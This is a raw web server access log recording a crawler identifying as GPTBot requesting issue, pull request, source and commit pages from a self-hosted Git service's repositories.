"https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 20122] [Gzip 5.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:19:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt?display=source" [Client 74.7.227.38] [Length 11489] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:19:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:19:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2f.vscode%2ftasks.json" [Client 74.7.227.38] [Length 25942] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 